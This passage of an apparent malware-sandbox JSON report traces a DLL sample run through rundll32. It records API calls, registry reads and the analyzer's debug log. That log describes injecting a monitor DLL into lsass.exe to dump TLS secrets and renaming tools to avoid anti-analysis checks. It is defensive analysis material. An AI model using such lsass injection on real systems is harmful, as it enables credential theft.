16:47:16,591","thread_id":"3260","caller":"0x00963a40","parentcaller":"0x00963d10","category":"system","api":"DllLoadNotification","status":true,"return":"0x00000000","arguments":[{"name":"NotificationReason","value":"load"},{"name":"DllName","value":"C:\\Windows\\System32\\CoreUIComponents"},{"name":"DllBase","value":"0x71ee0000"}],"repeated":0,"id":84},{"timestamp":"2025-11-15 16:47:16,591","thread_id":"3260","caller":"0x00963a40","parentcaller":"0x00963d10","category":"system","api":"DllLoadNotification","status":true,"return":"0x00000000","arguments":[{"name":"NotificationReason","value":"load"},{"name":"DllName","value":"C:\\Windows\\SYSTEM32\\textinputframework"},{"name":"DllBase","value":"0x72160000"}],"repeated":0,"id":85},{"timestamp":"2025-11-15 16:47:16,591","thread_id":"3260","caller":"0x00963a40","parentcaller":"0x00963d10","category":"system","api":"LdrLoadDll","status":true,"return":"0x00000000","arguments":[{"name":"Flags","value":"0x00000000"},{"name":"FileName","value":"kernel32.dll"},{"name":"BaseAddress","value":"0x76330000"}],"repeated":0,"id":86},{"timestamp":"2025-11-15 16:47:41,576","thread_id":"4040","caller":"0x77a264c6","parentcaller":"0x77a263d1","category":"threading","api":"NtTestAlert","status":true,"return":"0x00000000","arguments":[],"repeated":0,"id":87},{"timestamp":"2025-11-15 16:47:46,591","thread_id":"4040","caller":"0x76057924","parentcaller":"0x76fac105","category":"system","api":"NtDuplicateObject","status":true,"return":"0x00000000","arguments":[{"name":"SourceProcessHandle","value":"0xffffffff"},{"name":"SourceHandle","value":"0xfffffffe"},{"name":"TargetProcessHandle","value":"0xffffffff"},{"name":"TargetHandle","value":"0x0000033c"},{"name":"Options","value":"0x00000002"}],"repeated":0,"id":88},{"timestamp":"2025-11-15 16:47:46,591","thread_id":"4040","caller":"0x76facf78","parentcaller":"0x76face2d","category":"system","api":"NtClose","status":true,"return":"0x00000000","arguments":[{"name":"Handle","value":"0x000002f0"}],"repeated":0,"id":89},{"timestamp":"2025-11-15 16:47:46,591","thread_id":"6900","caller":"0x77a264c6","parentcaller":"0x77a263d1","category":"threading","api":"NtTestAlert","status":true,"return":"0x00000000","arguments":[],"repeated":0,"id":90},{"timestamp":"2025-11-15 16:48:15,857","thread_id":"3928","caller":"0x77a2b596","parentcaller":"0x779f60ac","category":"threading","api":"NtQueryInformationThread","status":true,"return":"0x00000000","arguments":[{"name":"ThreadHandle","value":"0xfffffffe"},{"name":"ThreadInformationClass","value":"12"},{"name":"ThreadInformation","value":"\\x00\\x00\\x00\\x00"},{"name":"ThreadId","value":"3928"}],"repeated":0,"id":91},{"timestamp":"2025-11-15 16:48:15,857","thread_id":"3928","caller":"0x77a2b5b9","parentcaller":"0x779f60ac","category":"threading","api":"NtTerminateThread","status":true,"return":"0x00000000","arguments":[{"name":"ThreadHandle","value":"0x00000000"},{"name":"ExitStatus","value":"0x00000000"},{"name":"ThreadId","value":"0"},{"name":"ProcessId","value":"0"}],"repeated":0,"id":92},{"timestamp":"2025-11-15 16:49:29,826","thread_id":"6900","caller":"0x77a2b596","parentcaller":"0x779f60ac","category":"threading","api":"NtQueryInformationThread","status":true,"return":"0x00000000","arguments":[{"name":"ThreadHandle","value":"0xfffffffe"},{"name":"ThreadInformationClass","value":"12"},{"name":"ThreadInformation","value":"\\x00\\x00\\x00\\x00"},{"name":"ThreadId","value":"6900"}],"repeated":0,"id":93},{"timestamp":"2025-11-15 16:49:29,826","thread_id":"6900","caller":"0x77a2b5b9","parentcaller":"0x779f60ac","category":"threading","api":"NtTerminateThread","status":true,"return":"0x00000000","arguments":[{"name":"ThreadHandle","value":"0x00000000"},{"name":"ExitStatus","value":"0x00000000"},{"name":"ThreadId","value":"0"},{"name":"ProcessId","value":"0"}],"repeated":0,"id":94},{"timestamp":"2025-11-15 16:49:29,826","thread_id":"4040","caller":"0x77a2b596","parentcaller":"0x779f60ac","category":"threading","api":"NtQueryInformationThread","status":true,"return":"0x00000000","arguments":[{"name":"ThreadHandle","value":"0xfffffffe"},{"name":"ThreadInformationClass","value":"12"},{"name":"ThreadInformation","value":"\\x00\\x00\\x00\\x00"},{"name":"ThreadId","value":"4040"}],"repeated":0,"id":95},{"timestamp":"2025-11-15 16:49:29,826","thread_id":"4040","caller":"0x76048b4a","parentcaller":"0x76fcda84","category":"system","api":"NtClose","status":true,"return":"0x00000000","arguments":[{"name":"Handle","value":"0x0000033c"}],"repeated":0,"id":96},{"timestamp":"2025-11-15 16:49:29,826","thread_id":"4040","caller":"0x76048b4a","parentcaller":"0x76fcdb06","category":"system","api":"NtClose","status":true,"return":"0x00000000","arguments":[{"name":"Handle","value":"0x00000338"}],"repeated":0,"id":97},{"timestamp":"2025-11-15 16:49:29,826","thread_id":"4040","caller":"0x77a2b5b9","parentcaller":"0x779f60ac","category":"threading","api":"NtTerminateThread","status":true,"return":"0x00000000","arguments":[{"name":"ThreadHandle","value":"0x00000000"},{"name":"ExitStatus","value":"0x00000000"},{"name":"ThreadId","value":"0"},{"name":"ProcessId","value":"0"}],"repeated":0,"id":98}],"threads":["3260","6220","7476","4040","6900","3928"],"environ":{"UserName":"apogean","ComputerName":"DESKTOP-B6KVMU7","WindowsPath":"C:\\Windows","TempPath":"C:\\Users\\apogean\\AppData\\Local\\Temp\\","CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" \"C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll\",#1","RegisteredOwner":"","RegisteredOrganization":"","ProductName":"","SystemVolumeSerialNumber":"9e1a-68e8","SystemVolumeGUID":"3199a954-0000-0000-0000-300300000000","MachineGUID":"","MainExeBase":"0x00960000","MainExeSize":"0x00014000","Bitness":"32-bit"},"file_activities":{"read_files":[],"write_files":[],"delete_files":[]}}],"anomaly":[],"processtree":[{"name":"rundll32.exe","pid":1052,"parent_id":7528,"module_path":"C:\\Windows\\SysWOW64\\rundll32.exe","children":[],"threads":["3260","6220","7476","4040","6900","3928"],"environ":{"UserName":"apogean","ComputerName":"DESKTOP-B6KVMU7","WindowsPath":"C:\\Windows","TempPath":"C:\\Users\\apogean\\AppData\\Local\\Temp\\","CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" \"C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll\",#1","RegisteredOwner":"","RegisteredOrganization":"","ProductName":"","SystemVolumeSerialNumber":"9e1a-68e8","SystemVolumeGUID":"3199a954-0000-0000-0000-300300000000","MachineGUID":"","MainExeBase":"0x00960000","MainExeSize":"0x00014000","Bitness":"32-bit"}}],"summary":{"files":["C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll.manifest","C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll","C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll.123.Manifest","C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll.124.Manifest","C:\\Windows\\System32\\en-US\\KERNELBASE.dll.mui","C:\\Windows\\sysnative\\en-US\\KERNELBASE.dll.mui","C:\\Windows\\SysWOW64\\en-US\\rundll32.exe.mui","C:\\Windows\\sysnative\\en-US\\rundll32.exe.mui"],"read_files":[],"write_files":[],"delete_files":[],"keys":["HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide","HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest","HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\en-US"],"read_keys":["HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest"],"write_keys":[],"delete_keys":[],"executed_commands":[],"resolved_apis":[],"mutexes":[],"created_services":[],"started_services":[]},"enhanced":[{"event":"read","object":"registry","timestamp":"2025-11-15 16:47:16,279","eid":1,"data":{"regkey":"HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest","content":null}},{"event":"read","object":"registry","timestamp":"2025-11-15 16:47:16,279","eid":2,"data":{"regkey":"HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest","content":null}},{"event":"read","object":"registry","timestamp":"2025-11-15 16:47:16,295","eid":3,"data":{"regkey":"HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest","content":null}},{"event":"load","object":"library","timestamp":"2025-11-15 16:47:16,310","eid":4,"data":{"file":"C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll","pathtofile":null,"moduleaddress":"0x00000000"}},{"event":"load","object":"library","timestamp":"2025-11-15 16:47:16,513","eid":5,"data":{"file":"C:\\Windows\\System32\\uxtheme.dll","pathtofile":null,"moduleaddress":"0x73ae0000"}},{"event":"load","object":"library","timestamp":"2025-11-15 16:47:16,591","eid":6,"data":{"file":"kernel32.dll","pathtofile":null,"moduleaddress":"0x76330000"}}],"encryptedbuffers":[]},"debug":{"log":"2025-11-14 14:52:10,430 [root] INFO: Date set to: 20251115T08:47:01, timeout set to: 200\n2025-11-15 08:47:01,228 [root] DEBUG: Starting analyzer from: C:\\yzxx4c5b\n2025-11-15 08:47:01,228 [root] DEBUG: Storing results at: C:\\zFLSjDX\n2025-11-15 08:47:01,228 [root] DEBUG: Pipe server name: \\\\.\\PIPE\\IoWoJfwM\n2025-11-15 08:47:01,228 [root] DEBUG: Python path: C:\\Users\\apogean\\AppData\\Local\\Programs\\Python\\Python311-32\n2025-11-15 08:47:01,228 [root] INFO: analysis running as an admin\n2025-11-15 08:47:01,228 [root] INFO: analysis package specified: \"dll\"\n2025-11-15 08:47:01,228 [root] DEBUG: importing analysis package module: \"modules.packages.dll\"...\n2025-11-15 08:47:01,759 [root] DEBUG: imported analysis package \"dll\"\n2025-11-15 08:47:01,759 [root] DEBUG: initializing analysis package \"dll\"...\n2025-11-15 08:47:01,774 [lib.common.common] INFO: wrapping\n2025-11-15 08:47:01,774 [lib.core.compound] INFO: C:\\Users\\apogean\\AppData\\Local\\Temp already exists, skipping creation\n2025-11-15 08:47:01,790 [root] DEBUG: New location of moved file: C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll\n2025-11-15 08:47:01,790 [root] INFO: Analyzer: Package modules.packages.dll does not specify a DLL option\n2025-11-15 08:47:01,806 [root] INFO: Analyzer: Package modules.packages.dll does not specify a DLL_64 option\n2025-11-15 08:47:01,806 [root] INFO: Analyzer: Package modules.packages.dll does not specify a loader option\n2025-11-15 08:47:01,821 [root] INFO: Analyzer: Package modules.packages.dll does not specify a loader_64 option\n2025-11-15 08:47:03,476 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.browser\"\n2025-11-15 08:47:03,482 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.curtain\"\n2025-11-15 08:47:03,528 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.digisig\"\n2025-11-15 08:47:03,733 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.disguise\"\n2025-11-15 08:47:03,757 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.evtx\"\n2025-11-15 08:47:03,767 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.procmon\"\n2025-11-15 08:47:03,777 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.recentfiles\"\n2025-11-15 08:47:04,009 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'\n2025-11-15 08:47:04,009 [lib.api.screenshot] ERROR: No module named 'PIL'\n2025-11-15 08:47:04,009 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.screenshots\"\n2025-11-15 08:47:04,039 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.sysmon\"\n2025-11-15 08:47:04,078 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.tlsdump\"\n2025-11-15 08:47:04,086 [modules.auxiliary.watchdownloads] DEBUG: Could not load auxiliary module WatchDownloads due to 'No module named 'watchdog''\n2025-11-15 08:47:04,086 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.watchdownloads\"\n2025-11-15 08:47:04,088 [root] DEBUG: Initialized auxiliary module \"Browser\"\n2025-11-15 08:47:04,088 [root] DEBUG: attempting to configure 'Browser' from data\n2025-11-15 08:47:04,088 [root] DEBUG: module Browser does not support data configuration, ignoring\n2025-11-15 08:47:04,088 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.browser\"...\n2025-11-15 08:47:04,099 [root] DEBUG: Started auxiliary module modules.auxiliary.browser\n2025-11-15 08:47:04,099 [root] DEBUG: Initialized auxiliary module \"Curtain\"\n2025-11-15 08:47:04,099 [root] DEBUG: attempting to configure 'Curtain' from data\n2025-11-15 08:47:04,099 [root] DEBUG: module Curtain does not support data configuration, ignoring\n2025-11-15 08:47:04,099 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.curtain\"...\n2025-11-15 08:47:04,104 [root] DEBUG: Started auxiliary module modules.auxiliary.curtain\n2025-11-15 08:47:04,104 [root] DEBUG: Initialized auxiliary module \"DigiSig\"\n2025-11-15 08:47:04,104 [root] DEBUG: attempting to configure 'DigiSig' from data\n2025-11-15 08:47:04,104 [root] DEBUG: module DigiSig does not support data configuration, ignoring\n2025-11-15 08:47:04,104 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.digisig\"...\n2025-11-15 08:47:04,107 [modules.auxiliary.digisig] DEBUG: Checking for a digital signature\n2025-11-15 08:47:04,539 [modules.auxiliary.digisig] DEBUG: File is not signed\n2025-11-15 08:47:04,539 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json\n2025-11-15 08:47:04,539 [root] DEBUG: Started auxiliary module modules.auxiliary.digisig\n2025-11-15 08:47:04,539 [root] DEBUG: Initialized auxiliary module \"Disguise\"\n2025-11-15 08:47:04,539 [root] DEBUG: attempting to configure 'Disguise' from data\n2025-11-15 08:47:04,539 [root] DEBUG: module Disguise does not support data configuration, ignoring\n2025-11-15 08:47:04,539 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.disguise\"...\n2025-11-15 08:47:04,544 [modules.auxiliary.disguise] INFO: Disguising GUID to 145a4b6a-fc8d-49b0-8ba3-d936855b2e01\n2025-11-15 08:47:04,544 [root] DEBUG: Started auxiliary module modules.auxiliary.disguise\n2025-11-15 08:47:04,544 [root] DEBUG: Initialized auxiliary module \"Evtx\"\n2025-11-15 08:47:04,544 [root] DEBUG: attempting to configure 'Evtx' from data\n2025-11-15 08:47:04,544 [root] DEBUG: module Evtx does not support data configuration, ignoring\n2025-11-15 08:47:04,544 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.evtx\"...\n2025-11-15 08:47:04,549 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Security State Change\" /success:enable /failure:enable\n2025-11-15 08:47:04,549 [root] DEBUG: Started auxiliary module modules.auxiliary.evtx\n2025-11-15 08:47:04,549 [root] DEBUG: Initialized auxiliary module \"Procmon\"\n2025-11-15 08:47:04,549 [root] DEBUG: attempting to configure 'Procmon' from data\n2025-11-15 08:47:04,549 [root] DEBUG: module Procmon does not support data configuration, ignoring\n2025-11-15 08:47:04,549 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.procmon\"...\n2025-11-15 08:47:04,549 [root] DEBUG: Started auxiliary module modules.auxiliary.procmon\n2025-11-15 08:47:04,549 [root] DEBUG: Initialized auxiliary module \"RecentFiles\"\n2025-11-15 08:47:04,549 [root] DEBUG: attempting to configure 'RecentFiles' from data\n2025-11-15 08:47:04,554 [root] DEBUG: module RecentFiles does not support data configuration, ignoring\n2025-11-15 08:47:04,554 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.recentfiles\"...\n2025-11-15 08:47:04,559 [modules.auxiliary.recentfiles] DEBUG: Wrote 'recentfile' C:\\Users\\apogean\\Documents\\IZIBpirCfXPkpIgQ.docm to disk.\n2025-11-15 08:47:04,689 [modules.auxiliary.recentfiles] DEBUG: Wrote 'recentfile' C:\\Users\\apogean\\Documents\\qPtkBAPBexz.docx to disk.\n2025-11-15 08:47:04,720 [modules.auxiliary.recentfiles] DEBUG: Wrote 'recentfile' C:\\Users\\apogean\\Documents\\iJhLwXWjTGpJi.rtf to disk.\n2025-11-15 08:47:04,744 [modules.auxiliary.recentfiles] DEBUG: Wrote 'recentfile' C:\\Users\\apogean\\Documents\\pfYBaXHQVy.doc to disk.\n2025-11-15 08:47:04,764 [modules.auxiliary.recentfiles] DEBUG: Wrote 'recentfile' C:\\Users\\apogean\\Documents\\FYraemJhMCalUUoe.docx to disk.\n2025-11-15 08:47:04,779 [modules.auxiliary.recentfiles] DEBUG: Wrote 'recentfile' C:\\Users\\apogean\\Documents\\hTXfKuLyuLyj.doc to disk.\n2025-11-15 08:47:04,814 [modules.auxiliary.recentfiles] DEBUG: Wrote 'recentfile' C:\\Users\\apogean\\Documents\\HXtRBxCOej.ppt to disk.\n2025-11-15 08:47:04,824 [modules.auxiliary.recentfiles] DEBUG: Wrote 'recentfile' C:\\Users\\apogean\\Documents\\IndLsTZBZq.pptx to disk.\n2025-11-15 08:47:04,844 [modules.auxiliary.recentfiles] DEBUG: Wrote 'recentfile' C:\\Users\\apogean\\Documents\\EdgLSUUTVd.pptx to disk.\n2025-11-15 08:47:04,885 [modules.auxiliary.recentfiles] DEBUG: Wrote 'recentfile' C:\\Users\\apogean\\Documents\\MWjwhHEAsApE.pptx to disk.\n2025-11-15 08:47:04,894 [root] DEBUG: Started auxiliary module modules.auxiliary.recentfiles\n2025-11-15 08:47:04,894 [root] DEBUG: Initialized auxiliary module \"Screenshots\"\n2025-11-15 08:47:04,899 [root] DEBUG: attempting to configure 'Screenshots' from data\n2025-11-15 08:47:04,899 [root] DEBUG: module Screenshots does not support data configuration, ignoring\n2025-11-15 08:47:04,899 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.screenshots\"...\n2025-11-15 08:47:04,909 [modules.auxiliary.screenshots] WARNING: Python Image Library is not installed, screenshots are disabled\n2025-11-15 08:47:04,914 [root] DEBUG: Started auxiliary module modules.auxiliary.screenshots\n2025-11-15 08:47:04,914 [root] DEBUG: Initialized auxiliary module \"Sysmon\"\n2025-11-15 08:47:04,914 [root] DEBUG: attempting to configure 'Sysmon' from data\n2025-11-15 08:47:04,914 [root] DEBUG: module Sysmon does not support data configuration, ignoring\n2025-11-15 08:47:04,914 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.sysmon\"...\n2025-11-15 08:47:05,034 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Security System Extension\" /success:enable /failure:enable\n2025-11-15 08:47:05,207 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"System Integrity\" /success:enable /failure:enable\n2025-11-15 08:47:05,268 [root] WARNING: Cannot execute auxiliary module modules.auxiliary.sysmon: In order to use the Sysmon functionality, it is required to have the SMaster(64|32).exe file and sysmonconfig-export.xml file in the bin path. Note that the SMaster(64|32).exe files are just the standard Sysmon binaries renamed to avoid anti-analysis detection techniques.\n2025-11-15 08:47:05,268 [root] DEBUG: Initialized auxiliary module \"TLSDumpMasterSecrets\"\n2025-11-15 08:47:05,268 [root] DEBUG: attempting to configure 'TLSDumpMasterSecrets' from data\n2025-11-15 08:47:05,268 [root] DEBUG: module TLSDumpMasterSecrets does not support data configuration, ignoring\n2025-11-15 08:47:05,268 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.tlsdump\"...\n2025-11-15 08:47:05,275 [modules.auxiliary.tlsdump] INFO: lsass.exe found, pid 588\n2025-11-15 08:47:05,276 [lib.api.process] INFO: Monitor config for <Process 588 lsass.exe>: C:\\yzxx4c5b\\dll\\588.ini\n2025-11-15 08:47:05,284 [lib.api.process] INFO: Option 'tlsdump' with value '1' sent to monitor\n2025-11-15 08:47:05,290 [lib.api.process] INFO: 64-bit DLL to inject is C:\\yzxx4c5b\\dll\\UcXKmb.dll, loader C:\\yzxx4c5b\\bin\\XQZTKWcp.exe\n2025-11-15 08:47:05,319 [root] DEBUG: Loader: Injecting process 588 with C:\\yzxx4c5b\\dll\\UcXKmb.dll.\n2025-11-15 08:47:05,328 [root] DEBUG: 588: Python path set to 'C:\\Users\\apogean\\AppData\\Local\\Programs\\Python\\Python311-32'.\n2025-11-15 08:47:05,340 [root] DEBUG: 588: Disabling sleep skipping.\n2025-11-15 08:47:05,344 [root] DEBUG: 588: TLS secret dump mode enabled.\n2025-11-15 08:47:05,380 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"IPsec Driver\" /success:disable /failure:disable\n2025-11-15 08:47:05,399 [root] DEBUG: 588: RtlInsertInvertedFunctionTable 0x00007FFC1390090E, LdrpInvertedFunctionTableSRWLock 0x00007FFC13A5D510\n2025-11-15 08:47:05,409 [root] DEBUG: 588: Monitor initialised: 64-bit capemon loaded in process 588 at 0x00007FFBE2830000, thread 7368, image base 0x00007FF7C0B20000, stack from 0x0000001084073000-0x0000001084080000\n2025-11-15 08:47:05,419 [root] DEBUG: 588: Commandline: C:\\Windows\\system32\\lsass.exe\n2025-11-15 08:47:05,431 [root] DEBUG: 588: Hooked 5 out of 5 functions\n2025-11-15 08:47:05,434 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.\n2025-11-15 08:47:05,439 [root] DEBUG: Successfully injected DLL C:\\yzxx4c5b\\dll\\UcXKmb.dll.\n2025-11-15 08:47:05,444 [lib.api.process] INFO: Injected into 64-bit <Process 588 lsass.exe>\n2025-11-15 08:47:05,444 [root] DEBUG: Started auxiliary module modules.auxiliary.tlsdump\n2025-11-15 08:47:05,444 [root] DEBUG: Initialized auxiliary module \"WatchDownloads\"\n2025-11-15 08:47:05,444 [root] DEBUG: attempting to configure 'WatchDownloads' from data\n2025-11-15 08:47:05,444 [root] DEBUG: module WatchDownloads does not support data configuration, ignoring\n2025-11-15 08:47:05,444 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.watchdownloads\"...\n2025-11-15 08:47:05,444 [root] DEBUG: Started auxiliary module modules.auxiliary.watchdownloads\n2025-11-15 08:47:05,454 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Other System Events\" /success:disable /failure:enable\n2025-11-15 08:47:05,500 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Logon\" /success:enable /failure:enable\n2025-11-15 08:47:05,545 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Logoff\" /success:enable /failure:enable\n2025-11-15 08:47:05,636 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Account Lockout\" /success:enable /failure:enable\n2025-11-15 08:47:05,782 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"IPsec Main Mode\" /success:disable /failure:disable\n2025-11-15 08:47:05,875 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"IPsec Quick Mode\" /success:disable /failure:disable\n2025-11-15 08:47:05,969 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"IPsec Extended Mode\" /success:disable /failure:disable\n2025-11-15 08:47:06,095 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Other Logon/Logoff Events\" /success:enable /failure:enable\n2025-11-15 08:47:06,195 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Network Policy Server\" /success:enable /failure:enable\n2025-11-15 08:47:06,295 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Special Logon\" /success:enable /failure:enable\n2025-11-15 08:47:06,373 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"File System\" /success:enable /failure:enable\n2025-11-15 08:47:06,473 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Registry\" /success:enable /failure:enable\n2025-11-15 08:47:06,757 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Kernel Object\" /success:enable /failure:enable\n2025-11-15 08:47:06,829 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"SAM\" /success:disable /failure:disable\n2025-11-15 08:47:06,908 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Certification Services\" /success:enable /failure:enable\n2025-11-15 08:47:07,018 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Handle Manipulation\" /success:disable /failure:disable\n2025-11-15 08:47:07,221 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Application Generated\" /success:enable /failure:enable\n2025-11-15 08:47:07,623 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"File Share\" /success:enable /failure:enable\n2025-11-15 08:47:07,701 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Filtering Platform Packet Drop\" /success:disable /failure:disable\n2025-11-15 08:47:07,812 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Filtering Platform Connection\" /success:disable /failure:disable\n2025-11-15 08:47:07,900 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Other Object Access Events\" /success:disable /failure:disable\n2025-11-15 08:47:08,001 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Sensitive Privilege Use\" /success:disable /failure:disable\n2025-11-15 08:47:08,085 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Non Sensitive Privilege Use\" /success:disable /failure:disable\n2025-11-15 08:47:08,170 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Other Privilege Use Events\" /success:disable /failure:disable\n2025-11-15 08:47:08,270 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"RPC Events\" /success:enable /failure:enable\n2025-11-15 08:47:08,339 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Audit Policy Change\" /success:enable /failure:enable\n2025-11-15 08:47:08,424 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Authentication Policy Change\" /success:enable /failure:enable\n2025-11-15 08:47:08,524 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"MPSSVC Rule-Level Policy Change\" /success:disable /failure:disable\n2025-11-15 08:47:08,862 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Filtering Platform Policy Change\" /success:disable /failure:disable\n2025-11-15 08:47:08,947 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Other Policy Change Events\" /success:disable /failure:enable\n2025-11-15 08:47:09,016 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"User Account Management\" /success:enable /failure:enable\n2025-11-15 08:47:09,116 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Computer Account Management\" /success:enable /failure:enable\n2025-11-15 08:47:09,210 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Security Group Management\" /success:enable /failure:enable\n2025-11-15 08:47:09,279 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Distribution Group Management\" /success:enable /failure:enable\n2025-11-15 08:47:09,395 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Application Group Management\" /success:enable /failure:enable\n2025-11-15 08:47:09,480 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Other Account Management Events\" /success:enable /failure:enable\n2025-11-15 08:47:09,578 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Directory Service Access\" /success:enable /failure:enable\n2025-11-15 08:47:09,680 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Directory Service Changes\" /success:enable /failure:enable\n2025-11-15 08:47:09,761 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Directory Service Replication\" /success:disable /failure:enable\n2025-11-15 08:47:09,861 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Detailed Directory Service Replication\" /success:disable /failure:disable\n2025-11-15 08:47:09,940 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Credential Validation\" /success:enable /failure:enable\n2025-11-15 08:47:10,032 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Kerberos Service Ticket Operations\" /success:enable /failure:enable\n2025-11-15 08:47:10,141 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Other Account Logon Events\" /success:enable /failure:enable\n2025-11-15 08:47:10,231 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Kerberos Authentication Service\" /success:enable /failure:enable\n2025-11-15 08:47:10,344 